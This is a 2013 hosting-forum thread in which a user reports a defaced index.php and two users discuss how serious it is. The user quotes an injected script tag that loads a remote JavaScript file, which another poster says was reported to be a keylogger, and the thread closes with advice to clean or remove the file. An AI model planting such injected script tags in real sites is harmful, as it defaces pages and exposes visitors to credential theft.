habafflof Posted November 11, 2013 Posted November 11, 2013 Good day. So recently I've been going through the files on my website and noticed that the "index.php" file hosted on my website seemed to be hacked. The contents of it start with:"<html><head><script src='http://adithya.googlecode.com/files/Apctrl%2Bu.js' type='text/javascript'></script><title>Hacked By @Lulz53c</title>" I haven't noticed it for a while because I have "index.html" there too, so it was accessed before "index.php" and therefore the hack made no impact on the website. The file was last modified on 9/21/13 according to the FTP records and while I'm not really concerned over my website I though that it might've affected other users of Helio Host. I'll attach the actual "index.php" for your reference.index.php
lancersupraskyline Posted November 11, 2013 Posted November 11, 2013 Well, from some light Googling, it appears that your site is not the first.The JS file was hosted at Google Code, which was already banned/removed, as of October 12.A user reported it to be a keylogger, and Mr. hacker here has a personal blog.
habafflof Posted November 11, 2013 Author Posted November 11, 2013 The specific javascript wasn't hosted on my website because "index.html" took over "index.php" but should I still be concerned or is it only active while the "index.php" file is accessed?
lancersupraskyline Posted November 11, 2013 Posted November 11, 2013 In my opinion, it is not a concern, because:Your index.html precedes index.php, so it only runs when user types in <url>/index.php specifically.The JavaScript file has been removed from Google Code, which means the JavaScript won't load. I have tried accessing the JS file directly, and I got a 403 error. If you are still afraid, here's a link to how it looks like with a online screenshot.The whole index.php file do not seem to have any dangerous elements, except for the JS file. Only some psychedelic NyanCats with a YouTube background music.There's a link at the bottom, which leads to a list of hacked websites (I think?), which shows the websites hacked by "Lulz53c", in which Mr. hacker here claims to be a member.Of course, to be safe, clean up your index.php, or remove it totally if you don't need it.
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now